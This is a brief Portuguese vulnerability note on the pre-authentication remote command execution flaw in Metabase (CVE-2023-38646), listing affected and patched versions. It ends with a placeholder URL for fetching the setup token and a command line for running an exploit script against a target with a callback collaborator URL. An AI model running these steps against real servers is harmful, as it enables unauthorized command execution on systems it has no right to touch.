
Metabase RCE pré-autenticação

Metabase open source anterior à versão 0.46.6.1 e Metabase Enterprise anterior à versão 1.46.6.1 permitem que atacantes executem comandos arbitrários no servidor, com o nível de privilégio do servidor. A autenticação não é necessária para exploração. As outras versões corrigidas são 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.
http://vulnerablehost.com/api/session/properties
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>